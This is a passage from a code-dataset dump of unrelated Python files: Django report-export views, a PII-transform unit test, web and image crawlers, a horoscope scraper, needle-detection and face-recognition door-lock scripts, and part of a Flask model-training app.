evidence image format',\n 'error', request)\n return HttpResponse(\"Error: Invalid evidence image format\",\n content_type=\"text/html\")\n\n\ndef key_existing_list(key):\n \"\"\"return the key's list if it exist, else list empty\"\"\"\n return util.list_s3_objects(CLIENT_S3, BUCKET_S3, key)\n\n\ndef delete_project(project):\n \"\"\"Delete project information.\"\"\"\n project = project.lower()\n are_users_removed = remove_all_users_access(project)\n are_findings_masked = [\n finding_domain.mask_finding(finding_id)\n for finding_id in project_domain.list_findings(project)]\n update_project_state_db = project_domain.update(project, {'project_status': 'FINISHED'})\n is_project_deleted = all([\n are_findings_masked, are_users_removed, update_project_state_db])\n util.invalidate_cache(project)\n\n return is_project_deleted\n\n\ndef remove_all_users_access(project):\n \"\"\"Remove user access to project.\"\"\"\n user_active = project_domain.get_users(project)\n user_suspended = project_domain.get_users(project, active=False)\n all_users = user_active + user_suspended\n are_users_removed = True\n for user in all_users:\n is_user_removed = project_domain.remove_user_access(project, user, 'customeradmin')\n if is_user_removed:\n are_users_removed = True\n else:\n are_users_removed = False\n break\n return are_users_removed\n\n\n@cache_content\n@never_cache\n@csrf_exempt\n@require_http_methods([\"GET\"])\n@authorize(['analyst', 'admin'])\ndef download_vulnerabilities(request, findingid):\n \"\"\"Download a file with all the vulnerabilities.\"\"\"\n if not has_access_to_finding(request.session['username'], findingid,\n request.session['role']):\n util.cloudwatch_log(request,\n 'Security: \\\nAttempted to retrieve vulnerabilities without permission')\n return util.response([], 'Access denied', True)\n else:\n finding = get_vulnerabilities_by_type(findingid)\n data_yml = {}\n vuln_types = {'ports': dict, 'lines': dict, 'inputs': dict}\n if finding:\n for vuln_key, cast_fuction in list(vuln_types.items()):\n if finding.get(vuln_key):\n data_yml[vuln_key] = list(map(cast_fuction, list(finding.get(vuln_key))))\n else:\n # This finding does not have this type of vulnerabilities\n pass\n else:\n # This finding does not have new vulnerabilities\n pass\n project = finding_domain.get_finding(findingid)['projectName']\n file_name = '/tmp/{project}-{finding_id}.yaml'.format(\n finding_id=findingid, project=project)\n stream = open(file_name, 'w')\n yaml.safe_dump(data_yml, stream, default_flow_style=False)\n try:\n with open(file_name, 'rb') as file_obj:\n response = HttpResponse(file_obj.read(), content_type='text/x-yaml')\n response['Content-Disposition'] = \\\n 'attachment; filename=\"{project}-{finding_id}.yaml\"'.format(\n finding_id=findingid, project=project)\n return response\n except IOError:\n rollbar.report_message('Error: Invalid vulnerabilities file format', 'error', request)\n return util.response([], 'Invalid vulnerabilities file format', True)\n\n\n@never_cache\n@require_http_methods([\"GET\"])\n# pylint: disable=too-many-locals\ndef generate_complete_report(request):\n user_data = util.get_jwt_content(request)\n projects = user_domain.get_projects(user_data['user_email'])\n book = load_workbook('/usr/src/app/app/techdoc/templates/COMPLETE.xlsx')\n sheet = book.active\n\n project_col = 1\n finding_col = 2\n vuln_where_col = 3\n vuln_specific_col = 4\n treatment_col = 5\n treatment_mgr_col = 6\n row_offset = 2\n\n row_index = row_offset\n for project in projects:\n findings = project_domain.get_released_findings(\n project, 'finding_id, finding, treatment')\n for finding in findings:\n vulns = finding_dal.get_vulnerabilities(finding['finding_id'])\n for vuln in vulns:\n sheet.cell(row_index, vuln_where_col, vuln['where'])\n sheet.cell(row_index, vuln_specific_col, vuln['specific'])\n\n sheet.cell(row_index, project_col, project.upper())\n sheet.cell(row_index, finding_col, '{name!s} (#{id!s})'.format(\n name=finding['finding'].encode('utf-8'),\n id=finding['finding_id']))\n sheet.cell(row_index, treatment_col, finding['treatment'])\n sheet.cell(row_index, treatment_mgr_col,\n vuln.get('treatment_manager', 'Unassigned'))\n\n row_index += 1\n\n username = user_data['user_email'].split('@')[0].encode('utf8', 'ignore')\n filename = 'complete_report.xlsx'\n filepath = '/tmp/{username}-{filename}'.format(filename=filename,\n username=username)\n book.save(filepath)\n\n with open(filepath, 'rb') as document:\n response = HttpResponse(document.read())\n response['Content-Type'] = 'application/vnd.openxmlformats\\\n -officedocument.spreadsheetml.sheet'\n response['Content-Disposition'] = 'inline;filename={filename}'.format(\n filename=filename)\n return response\n\n\n@cache_content\n@never_cache\n@authorize(['admin'])\ndef export_all_vulnerabilities(request):\n user_data = util.get_jwt_content(request)\n filepath = generate_all_vulns_xlsx(user_data['user_email'])\n filename = os.path.basename(filepath)\n with open(filepath, 'rb') as document:\n response = HttpResponse(document.read())\n response['Content-Type'] = 'application/vnd.openxmlformats\\\n -officedocument.spreadsheetml.sheet'\n response['Content-Disposition'] = 'inline;filename={filename}'.format(\n filename=filename)\n return response\n\n\n@cache_content\n@never_cache\n@authorize(['admin'])\ndef export_users(request):\n user_data = util.get_jwt_content(request)\n book = Workbook()\n sheet = book.active\n sheet.append(['full_name', 'user_email'])\n row_index = 2\n\n unique_users = []\n for user in user_dal.get_platform_users():\n user_email = user['user_email'].lower()\n if user_email not in unique_users:\n unique_users.append(user_email)\n\n name_attrs = user_domain.get_attributes(\n user_email, ['first_name', 'last_name'])\n full_name = ' '.join(list(name_attrs.values()))\n\n sheet.cell(row_index, 1, full_name)\n sheet.cell(row_index, 2, user_email)\n row_index += 1\n\n username = user_data['user_email'].split('@')[0].encode('utf8', 'ignore')\n filepath = f'/tmp/{username}-users.xlsx'\n filename = os.path.basename(filepath)\n book.save(filepath)\n\n with open(filepath, 'rb') as document:\n response = HttpResponse(document.read())\n response['Content-Type'] = 'application/vnd.openxmlformats\\\n -officedocument.spreadsheetml.sheet'\n response['Content-Disposition'] = f'inline;filename={filename}'\n return response\n","repo_name":"tom-vanbraband-sonarsource/integrates","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":21270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3112999207","text":"\"\"\"\nTest the PiiSubstitutionValue class\n\"\"\"\n\nfrom pathlib import Path\n\nimport tempfile\nimport pytest\n\nfrom typing import Dict\n\nfrom pii_data.types.piicollection import PiiCollectionLoader\nfrom pii_data.types.doc.localdoc import BaseLocalSrcDocument, LocalSrcDocumentFile\nfrom pii_data.helper.io import load_yaml\n\nimport pii_transform.api.transform as mod\n\n\nDATADIR = Path(__file__).parents[2] / \"data\"\n\n\ndef save_load(doc: BaseLocalSrcDocument) -> Dict:\n try:\n f = tempfile.NamedTemporaryFile(mode=\"wt\", suffix=\".yml\", delete=False)\n doc.dump(f, format=\"yml\")\n f.close()\n return load_yaml(f.name)\n finally:\n Path(f.name).unlink()\n\n\n# -----------------------------------------------------------------------\n\n\ndef test10_constructor():\n \"\"\"\n Test constructing the object\n \"\"\"\n m = mod.PiiTransformer()\n assert str(m) == \"\"\n\n\ndef test20_process_seq():\n \"\"\"\n \"\"\"\n doc = LocalSrcDocumentFile(DATADIR / \"minidoc-example-seq-orig.yaml\")\n pii = PiiCollectionLoader()\n pii.load_json(DATADIR / \"minidoc-example-seq-pii.json\")\n m = mod.PiiTransformer()\n result = m(doc, pii)\n\n got = save_load(result)\n exp = load_yaml(DATADIR / \"minidoc-example-seq-repl.yaml\")\n assert exp == got\n\n\ndef test30_process_tree():\n \"\"\"\n \"\"\"\n doc = LocalSrcDocumentFile(DATADIR / \"minidoc-example-tree-orig.yaml\")\n pii = PiiCollectionLoader()\n pii.load_json(DATADIR / \"minidoc-example-tree-pii.json\")\n m = mod.PiiTransformer()\n result = m(doc, pii)\n\n got = save_load(result)\n exp = load_yaml(DATADIR / \"minidoc-example-tree-repl.yaml\")\n assert exp == got\n\n\ndef test40_process_table():\n \"\"\"\n \"\"\"\n doc = LocalSrcDocumentFile(DATADIR / \"minidoc-example-table-orig.yaml\")\n pii = PiiCollectionLoader()\n pii.load_json(DATADIR / \"minidoc-example-table-pii.json\")\n m = mod.PiiTransformer()\n result = m(doc, pii)\n\n got = save_load(result)\n exp = load_yaml(DATADIR / \"minidoc-example-table-repl.yaml\")\n assert exp == got\n\n\n\ndef test50_process_seq_ignore():\n \"\"\"\n Modify the PII collection to ignore some of the fields\n \"\"\"\n doc = LocalSrcDocumentFile(DATADIR / \"minidoc-example-seq-orig.yaml\")\n pii = PiiCollectionLoader()\n pii.load_json(DATADIR / \"minidoc-example-seq-ignore-pii.json\")\n\n m = mod.PiiTransformer()\n result = m(doc, pii)\n\n got = save_load(result)\n exp = load_yaml(DATADIR / \"minidoc-example-seq-ignore-repl.yaml\")\n assert exp == got\n","repo_name":"piisa/pii-transform","sub_path":"test/unit/api/test_transform.py","file_name":"test_transform.py","file_ext":"py","file_size_in_byte":2499,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"16002080295","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom crawlers.utils import get_datefmt_text, check_contain_datefmt_text\nimport subprocess\nimport yaml\nimport os\nimport platform\n\n\nclass Crawler:\n def __init__(self, wait_time: int=10):\n with open(os.path.join('config', 'config.yaml')) as f:\n config = yaml.load(f, Loader=yaml.FullLoader)\n self.chrome_path = config['chrome_path']\n self.driver = None\n self.wait = None\n self.wait_time = wait_time\n\n def open(self, url: str, driver_path: str):\n if platform.system().lower().startswith('window'):\n subprocess.Popen(\n r'{} --remote-debugging-port=9222 --user-data-dir=\"C:\\chrometemp\"'.format(self.chrome_path))\n option = Options()\n option.add_experimental_option(\"debuggerAddress\", \"127.0.0.1:9222\")\n self.driver = webdriver.Chrome(driver_path, options=option)\n else:\n self.driver = webdriver.Chrome(driver_path)\n\n self.wait = WebDriverWait(self.driver, self.wait_time)\n self.driver.get(url)\n\n @property\n def all_reviews_num(self):\n return int(self.wait.until(EC.element_to_be_clickable((By.XPATH, '/html/body/section/div/section/div[1]/div[2]/div[1]/h4/span'))).text)\n\n def get_info(self, wait: bool):\n if not wait:\n self.wait = WebDriverWait(self.driver, 0)\n\n reviews = [i.text.rstrip(' [more]') for i in self.wait.until(EC.presence_of_all_elements_located((By.CLASS_NAME, 'conWrap')))]\n\n try:\n scores = [i.text for i in self.wait.until(EC.presence_of_all_elements_located((By.CLASS_NAME, 'scoreNum')))]\n score_texts = [i.text for i in self.wait.until(EC.presence_of_all_elements_located((By.CLASS_NAME, 'scoreTxt')))]\n\n if len(scores) != len(reviews):\n for _ in range(len(reviews) - len(scores)):\n scores.append('-')\n score_texts.append('-')\n except Exception:\n scores = ['-' for _ in range(len(reviews))]\n score_texts = ['-' for _ in range(len(reviews))]\n\n dates = []\n\n for element in self.wait.until(EC.presence_of_all_elements_located((By.CLASS_NAME, 'txt'))):\n text = element.text\n if check_contain_datefmt_text(text):\n dates.append(get_datefmt_text(text))\n\n return {'date': dates, 'score': scores, 'score_category': score_texts, 'review': reviews}\n\n def get_pages_list(self):\n pages = []\n for text in self.wait.until(EC.presence_of_element_located((By.CLASS_NAME, 'pageNumBox'))).text.split('\\n'):\n if text.isnumeric():\n pages.append(int(text))\n\n return pages\n\n def click_page(self, page: int):\n self.wait.until(EC.element_to_be_clickable((By.XPATH, f'/html/body/section/div/section/div[2]/ul/li[{page}]'))).click()\n\n def click_pagemovebar(self, point: str):\n if point == 'left':\n self.wait.until(EC.element_to_be_clickable((By.XPATH, '/html/body/section/div/section/div[2]/button[1]'))).click()\n elif point == 'right':\n self.wait.until(EC.element_to_be_clickable((By.XPATH, '/html/body/section/div/section/div[2]/button[2]'))).click()\n else:\n raise Exception('Invalid pagemovebar')\n\n def quit(self):\n self.driver.quit()\n","repo_name":"limkaram/ReviewCrawler","sub_path":"crawlers/InterparkCrawler.py","file_name":"InterparkCrawler.py","file_ext":"py","file_size_in_byte":3573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39106901928","text":"# read values from data file\nfile_path = 'Day 1/Data.txt'\nfile = open(file_path, 'r')\nstrings = file.readlines()\n# cast strings from data file to ints\nints = []\nfor string in strings:\n\tints.append(int(string))\n# sum all value pairs to find x + y + z = 2020\ndef search(ints):\n\tfor x in ints:\n\t\tfor y in ints:\n\t\t\tfor z in ints:\n\t\t\t\tif (x + y + z) == 2020:\n\t\t\t\t\tresult = x * y * z\n\t\t\t\t\treturn result\n\nresult = search(ints)\nprint(result)","repo_name":"corygrube/Advent-of-Code-2020","sub_path":"Day 1/Day 1.2.py","file_name":"Day 1.2.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72279816890","text":"from collections import OrderedDict\nfrom bs4 import BeautifulSoup\nimport requests\n\n\nclass Horoscope:\n def __init__(self):\n self.d = OrderedDict(\n {(1,19):10,\n (2,18):11,\n (3,20):12,\n (4,19):1,\n (5,20):2,\n (6,20):3,\n (7,22):4,\n (8,22):5,\n (9,22):6,\n (10,22):7,\n (11,21):8,\n (12,21):9})\n \n def get_date(self):\n month = int(input('What month were you born? Please put the number of the month, for example, if you were born in April, you would input 4. '))\n day = int(input('What day were you born? '))\n return (month,day)\n \n def get_sign(self, date):\n for k in self.d.keys():\n if date <= k:\n return self.d[k]\n return self.d[(1,19)]\n \n def get_horoscope(self):\n date = self.get_date()\n sign = str(self.get_sign(date))\n url = 'https://www.horoscope.com/us/horoscopes/general/horoscope-general-daily-today.aspx?sign={}'.format(sign)\n response = requests.get(url)\n html = response.content\n\n soup = BeautifulSoup(html, 'lxml')\n return soup.body.p.text\n\n\nh = Horoscope()\nh.get_horoscope()","repo_name":"joepatten/horoscope","sub_path":"horoscope.py","file_name":"horoscope.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41354324344","text":"import pandas as pd\r\nimport cv2\r\nimport urllib.request\r\nimport numpy as np\r\nimport os\r\nfrom datetime import datetime\r\nimport face_recognition\r\nimport requests\r\n\r\npath = r'E:\\code\\face_recognition\\image_folder'\r\nimgUrl = 'http://192.168.137.162/cam-hi.jpg'\r\nokRqstUrl = 'http://192.168.137.154/?message=1'\r\nnoRqstUrl = 'http://192.168.137.154/?message=10'\r\nauthorized_dushan= 0\r\nauthorized_saman= 0\r\nauthorized_tharindu= 0\r\n\r\nif 'Attendance.csv' in os.listdir(os.path.join(os.getcwd(), 'attendace')):\r\n print(\"There is an existing attendance file.\")\r\n os.remove(\"Attendance.csv\")\r\nelse:\r\n df = pd.DataFrame(list())\r\n df.to_csv(\"Attendance.csv\")\r\n\r\nimages = []\r\nclassNames = []\r\nmyList = os.listdir(path)\r\nprint(myList)\r\nfor cl in myList:\r\n curImg = cv2.imread(f'{path}/{cl}')\r\n images.append(curImg)\r\n classNames.append(os.path.splitext(cl)[0])\r\nprint(classNames)\r\n\r\n\r\ndef findEncodings(images):\r\n encodeList = []\r\n for img in images:\r\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n encode = face_recognition.face_encodings(img)[0]\r\n encodeList.append(encode)\r\n return encodeList\r\n\r\n\r\ndef markAttendance(name):\r\n global authorized_dushan, authorized_saman, authorized_tharindu\r\n with open(\"Attendance.csv\", 'r+') as f:\r\n myDataList = f.readlines()\r\n nameList = []\r\n for line in myDataList:\r\n entry = line.split(',')\r\n nameList.append(entry[0])\r\n if name not in nameList:\r\n now = datetime.now()\r\n dtString = now.strftime('%H:%M:%S')\r\n f.writelines(f'\\n{name},{dtString}')\r\n \r\n if name==\"Tharindu\":\r\n authorized_tharindu=1\r\n elif name==\"Saman\":\r\n authorized_saman=1\r\n elif name==\"Dushan\":\r\n authorized_dushan=1\r\n if authorized_dushan+authorized_saman+authorized_tharindu>= 3:\r\n f.writelines(',Door Opened')\r\n\r\n\r\nencodeListKnown = findEncodings(images)\r\nprint('Encoding Complete')\r\n\r\nwhile True:\r\n img_resp = urllib.request.urlopen(imgUrl)\r\n imgnp = np.array(bytearray(img_resp.read()), dtype=np.uint8)\r\n img = cv2.imdecode(imgnp, -1)\r\n\r\n imgS = cv2.resize(img, (0, 0), None, 0.25, 0.25)\r\n imgS = cv2.cvtColor(imgS, cv2.COLOR_BGR2RGB)\r\n\r\n facesCurFrame = face_recognition.face_locations(imgS)\r\n encodesCurFrame = face_recognition.face_encodings(imgS, facesCurFrame)\r\n\r\n for encodeFace, faceLoc in zip(encodesCurFrame, facesCurFrame):\r\n matches = face_recognition.compare_faces(encodeListKnown, encodeFace)\r\n faceDis = face_recognition.face_distance(encodeListKnown, encodeFace)\r\n matchIndex = np.argmin(faceDis)\r\n\r\n if matches[matchIndex]:\r\n name = classNames[matchIndex].upper()\r\n y1, x2, y2, x1 = faceLoc\r\n y1, x2, y2, x1 = y1 * 4, x2 * 4, y2 * 4, x1 * 4\r\n cv2.rectangle(img, (x1, y1), (x2, y2), (0, 255, 0), 2)\r\n cv2.rectangle(img, (x1, y2 - 35), (x2, y2), (0, 255, 0), cv2.FILLED)\r\n cv2.putText(img, name, (x1 + 6, y2 - 6), cv2.FONT_HERSHEY_COMPLEX, 1, (255, 255, 255), 2)\r\n markAttendance(name)\r\n else:\r\n # Unrecognized face\r\n y1, x2, y2, x1 = faceLoc\r\n y1, x2, y2, x1 = y1 * 4, x2 * 4, y2 * 4, x1 * 4\r\n cv2.rectangle(img, (x1, y1), (x2, y2), (0, 0, 255), 2)\r\n cv2.rectangle(img, (x1, y2 - 35), (x2, y2), (0, 0, 255), cv2.FILLED)\r\n cv2.putText(img, 'Unrecognized', (x1 + 6, y2 - 6), cv2.FONT_HERSHEY_COMPLEX, 1, (255, 255, 255), 2)\r\n if authorized_dushan+authorized_saman+authorized_tharindu>= 3:\r\n print('Door Opened')\r\n response = requests.get(okRqstUrl)\r\n\r\n if response.status_code == 200:\r\n print(\"Response content:\")\r\n print(response.text)\r\n authorized_dushan= 0\r\n authorized_saman= 0\r\n authorized_tharindu= 0\r\n else:\r\n print(\"Request failed with status code:\", response.status_code)\r\n \r\n else:\r\n print('No')\r\n response = requests.get(noRqstUrl)\r\n\r\n if response.status_code == 200:\r\n print(\"Response content:\")\r\n print(response.text)\r\n else:\r\n print(\"Request failed with status code:\", response.status_code)\r\n\r\n cv2.imshow('Webcam', img)\r\n key = cv2.waitKey(5)\r\n if key == ord('q'):\r\n break\r\n\r\ncv2.destroyAllWindows()","repo_name":"APTlakshan/DoorLockingAndAlertingSystemWithAI","sub_path":"sampleFaceRecognitionCode.py","file_name":"sampleFaceRecognitionCode.py","file_ext":"py","file_size_in_byte":4547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24747208489","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 30 10:17:18 2017\n\n@author: erikb\n\"\"\"\n\nimport nltk\nfrom icrawler.builtin import GoogleImageCrawler, BingImageCrawler, BaiduImageCrawler, GreedyImageCrawler\n\nclass NounParser:\n\n def parse(self, sentence):\n nouns = []\n word_tokens = nltk.tag.pos_tag(nltk.word_tokenize(sentence))\n #if the word is a noun of pural noun add to list\n for word_tuple in word_tokens:\n if word_tuple[1] == 'NN' or word_tuple[1] == 'NS':\n nouns.append(word_tuple[0])\n \n return nouns\n \n \nclass Crawler:\n def __init__(self, width=800, height=600, num_pics = 10):\n self.min_height = height\n self.min_width = width\n self.num_of_images = num_pics\n \n def setMinResolution(self, min_width, min_height):\n self.min_width = min_width\n self.min_height = min_height\n \n def setNumOfImages(self, num):\n self.num_of_images = num\n \n def getImagesFromDomain(self, query, domain_url, num_pics): \n greedy_crawler = GreedyImageCrawler()\n greedy_crawler.crawl(domains=domain_url, max_num=self.num_of_images,\n min_size=(self.min_width,self.min_height), max_size=None)\n \n def Search(self, query):\n print(\"Using Google as a Default Implementation\")\n \nclass GoogleSearch(Crawler):\n def __init__(self, width, height, num_pics):\n Crawler.__init__(self, width, height)\n \n def Search(self, query):\n self.getImagesFromGoogle(query)\n \n def getImagesFromGoogle(self, query):\n google_crawler = GoogleImageCrawler(parser_threads=2, downloader_threads=4, storage={'root_dir': query+\"_images\"})\n google_crawler.crawl(keyword=query, max_num=self.num_of_images,\n date_min=None, date_max=None,\n min_size=(self.min_width,self.min_height), max_size=None)\nclass BingSearch(Crawler):\n def __init__(self, width, height, num_pics):\n Crawler.__init__(self, width, height)\n \n def Search(self, query):\n self.getImagesFromBing(query)\n \n def getImagesFromBing(self, query): \n bing_crawler = BingImageCrawler(downloader_threads=4)\n bing_crawler.crawl(keyword=query, offset=0, max_num=self.num_of_images,\n min_size=(self.min_width,self.min_height), max_size=None)\n \nclass BaiduSearch(Crawler):\n def __init__(self, width, height, num_pics):\n Crawler.__init__(self, width, height)\n \n def Search(self, query):\n self.getImagesFromBaidu(query)\n \n def getImagesFromBaidu(self, query):\n baidu_crawler = BaiduImageCrawler()\n baidu_crawler.crawl(keyword=query, offset=0, max_num=self.num_of_images,\n min_size=(self.min_width,self.min_height), max_size=None)\n\n\nclass Main:\n def __init__(self):\n self.noun_parser = NounParser()\n self.crawler = Crawler()\n self.image_height = 600\n self.image_width = 800\n self.num_pics = 10\n self.keep_searching = True\n #CONSTANTS \n self.GOOGLE = 1\n self.BING = 2\n self.BAIDU = 3\n self.DOMAINSEARCH = 4\n \n def getInputOption(self):\n return int(input(\" [1] Search Google \\n [2] Search Baidu \\n [3] Search Bing \\n [4] Search URL Domain \\n [5] STOP \\n\" + \\\n \"[6] Change Settings\"))\n \n def setSettings(self):\n choice = int(raw_input(\" [1] Set min resolution \\n [2] Set number of pictures per noun \\n\"))\n if(choice == 1):\n self.width = int(raw_input(\"Min width: \"))\n self.height = int(raw_input(\"Min height: \"))\n elif(choice == 2):\n self.num_pics = int(raw_input(\"Number of pictures per noun: \"))\n else:\n print(\"Enter a correct number\")\n \n def handleSearch(self, search_engine, nouns, domain=\"\"):\n if(search_engine == self.GOOGLE):\n self.crawler = GoogleSearch(self.width, self.height, self.num_pics)\n elif(search_engine == self.BING):\n self.crawler = BingSearch(self.width, self.height, self.num_pics)\n elif(search_engine == self.BAIDU):\n self.crawler = BaiduSearch(self.width, self.height, self.num_pics)\n else: #breaking point\n num_pics = int(raw_input(\"Number of pictures: \"))\n self.crawler.getImagesFromDomain(nouns, domain, num_pics)\n return\n \n for noun in nouns:\n self.crawler.Search(noun)\n \n \n def main(self):\n while self.keep_searching:\n option = self.getInputOption()\n domain = \"\"\n if(option == 4):\n domain = raw_input(\"Enter a URL to search: \")\n \n if(option <= 4): #searching for images \n query = raw_input(\"Enter a sentence: \")\n nouns = self.noun_parser.parse(query)\n self.handleSearch(option, nouns, domain)\n else:\n print(\"STOPPING - LATER\")\n self.keep_searching = False\n \n\ni = Main()\ni.main()","repo_name":"ebarns/ImageGrabber","sub_path":"imageGrabber.py","file_name":"imageGrabber.py","file_ext":"py","file_size_in_byte":5197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22681186200","text":"from needle_detection.preprocessing import read_frame, get_ROI\r\nfrom needle_detection.kernels import filter_kernel_parameters, build_gauss_kernel, build_sobel_kernel, convolution\r\nfrom needle_detection.line_detection import line_detector, build_probe_lines\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport needle_detection.parameters as p\r\nfrom skimage.draw import disk, line\r\nangle = p.angles[4]\r\n\r\n\r\nframe = read_frame('../needle_detection/resources/test/30.png')\r\nROI, rescale_factor = get_ROI(frame, angle)\r\n\r\nsigma_x, sigma_y, n = filter_kernel_parameters(frame) \r\n\r\ngauss_kernel = build_gauss_kernel(sigma_x, sigma_y, angle)\r\nsobel_kernel = build_sobel_kernel(n, angle)\r\nconvolved_kernels = convolution(sobel_kernel, gauss_kernel)\r\n\r\n\r\nfiltered_frame = convolution(ROI, convolved_kernels)\r\n\r\n\r\nprob_lines, num_lines, all_bs, all_ms, delta_b, y_pts, line_lengths, x_limits = build_probe_lines(filtered_frame, angle, rescale_factor)\r\n\r\nline_b, line_m, line_x, line_y, tip_x, tip_y, intensity_along_line, intensity_along_line_diff, diff_min_x, diff_min_y = line_detector(frame, num_lines, prob_lines, x_limits, line_lengths, y_pts, delta_b, rescale_factor, frame, all_bs, all_ms)\r\n\r\n\r\n#tip_x = int(round(diff_min_x/rescale_factor))\r\n#tip_y = int(round(diff_min_y/rescale_factor))\r\ncircle_y, circle_x = disk([tip_y, tip_x], 12)\r\nframe[circle_y, circle_x] = 255\r\n\r\nfor t in range(-3, 3):\r\n frame[line_y+t, line_x] = 255\r\n\r\n\r\nf, (ax1, ax2) = plt.subplots(nrows=1, ncols=2, figsize=(10,6))\r\nax1.imshow(frame, cmap='gray')\r\nax2.imshow(filtered_frame, cmap='gray')\r\nplt.savefig('172_line.png', dpi=300)\r\nplt.show()\r\nplt.close()","repo_name":"janwolzenburg/us-detection-biopsy-needle","sub_path":"examples/process_single_frame.py","file_name":"process_single_frame.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30081222943","text":"#Import required libraries\r\n\r\nimport base64\r\nimport os\r\nimport pickle\r\nfrom io import BytesIO\r\nfrom PIL import Image, ImageDraw, ImageFont\r\nfrom flask import Flask, request, render_template, redirect, url_for, flash\r\nimport tensorflow as tf\r\nimport numpy as np\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import LabelEncoder\r\nimport shutil\r\n\r\n\r\nPYTHONUNBUFFERED = \"anything_her\"\r\n\r\napp = Flask(__name__)\r\napp.secret_key = 'abababab123456'\r\n\r\n\r\n\r\napp.config['UPLOAD_FOLDER'] = r'upload/'\r\nupload_dir = app.config['UPLOAD_FOLDER']\r\napp.config['MODEL_FOLDER'] = r'model/'\r\nmodel_dir = app.config['MODEL_FOLDER']\r\n\r\nlabel_encoder_name = 'label_encoder.pkl'\r\nmodel_name = 'model.h5'\r\ndef load_custom_dataset(data_dir):\r\n # Load the image filenames and labels\r\n filenames = []\r\n labels = []\r\n for label in os.listdir(data_dir):\r\n label_dir = os.path.join(data_dir, label)\r\n for file in os.listdir(label_dir):\r\n filenames.append(os.path.join(label_dir, file))\r\n labels.append(label)\r\n\r\n # Convert the labels to integers\r\n num_classes = len(set(labels))\r\n label_encoder = LabelEncoder()\r\n labels = label_encoder.fit_transform(labels)\r\n # Save the label encoder object to a file\r\n\r\n with open(os.path.join(model_dir, label_encoder_name), 'wb') as f:\r\n pickle.dump(label_encoder, f)\r\n\r\n # Preprocess the dataset\r\n image_size = 299\r\n images = []\r\n one_hot_labels = []\r\n for filename, label in zip(filenames, labels):\r\n # Load and decode the image\r\n image = tf.io.read_file(filename)\r\n image = tf.image.decode_image(image, channels=3)\r\n\r\n # Resize the image to a fixed size\r\n image = tf.image.resize(image, (image_size, image_size))\r\n\r\n # Normalize the pixel values to the range [0, 1]\r\n image = image / 255.0\r\n\r\n # Convert the label to one-hot encoding\r\n label = tf.one_hot(label, num_classes)\r\n\r\n images.append(image)\r\n one_hot_labels.append(label)\r\n\r\n # Split the dataset into training and test sets\r\n x_train, x_test, y_train, y_test = train_test_split(images, one_hot_labels, test_size=0.2, shuffle=True)\r\n\r\n # Return the training and test data as tuples\r\n return (x_train, y_train), (x_test, y_test), num_classes\r\n\r\n@app.route('/', methods=['GET', 'POST'])\r\ndef upload_file():\r\n if request.method == 'POST':\r\n # Check if the Start Training button was clicked\r\n\r\n if 'start_training' in request.form:\r\n os.makedirs(model_dir, exist_ok=True)\r\n # Get the data directory from the form\r\n if 'files' in request.files:\r\n # Get the uploaded folder\r\n uploaded_folder = request.files.getlist(\"files\")\r\n for file in uploaded_folder:\r\n # Check if the selected item is a folder\r\n if file.filename == '':\r\n # Walk through the selected folder and its subfolders\r\n for root, dirs, files in os.walk(file.path):\r\n # Recreate the folder structure on the server\r\n server_folder = os.path.join(upload_dir, root[len(file.path) + 1:])\r\n os.makedirs(server_folder, exist_ok=True)\r\n # Upload the files in the current folder\r\n for file in files:\r\n file_path = os.path.join(root, file)\r\n with open(file_path, 'rb') as f:\r\n file_content = f.read()\r\n # Save the file to the server\r\n with open(os.path.join(server_folder, file), 'wb') as f:\r\n f.write(file_content)\r\n else:\r\n # Get the file's directory and filename\r\n directory, filename = os.path.split(file.filename)\r\n # Construct the absolute path to the file on the server\r\n server_file_path = os.path.join(upload_dir, directory, filename)\r\n # Create the directory structure if it does not exist\r\n os.makedirs(os.path.dirname(server_file_path), exist_ok=True)\r\n # Save the file to the server\r\n file.save(server_file_path)\r\n\r\n # Load the custom dataset\r\n data_dir, _ = os.path.split(directory)\r\n data_dir = os.path.join(upload_dir, data_dir)\r\n\r\n\r\n # Load the custom dataset\r\n (x_train, y_train), (x_test, y_test), num_classes = load_custom_dataset(data_dir)\r\n\r\n # Delete the temporary directory\r\n shutil.rmtree(upload_dir)\r\n\r\n # Load the Inception v3 model and remove the top layer\r\n base_model = tf.keras.applications.InceptionV3(weights='imagenet', include_top=False)\r\n\r\n # Add a new top layer\r\n x = base_model.output\r\n x = tf.keras.layers.GlobalAveragePooling2D()(x)\r\n x = tf.keras.layers.Dense(1024, activation='relu')(x)\r\n predictions = tf.keras.layers.Dense(num_classes, activation='softmax')(x)\r\n\r\n # Create the new model\r\n model = tf.keras.Model(inputs=base_model.input, outputs=predictions)\r\n\r\n # Freeze the base model layers\r\n for layer in base_model.layers:\r\n layer.trainable = False\r\n\r\n # Compile the model with a learning rate of 0.001 and a loss function of categorical crossentropy\r\n model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=0.001), loss='categorical_crossentropy',\r\n metrics=['accuracy'])\r\n\r\n # Normalize the pixel values in the training data to the range [0, 1]\r\n x_train = np.array(x_train)\r\n x_test = np.array(x_test)\r\n y_train = np.array(y_train)\r\n y_test = 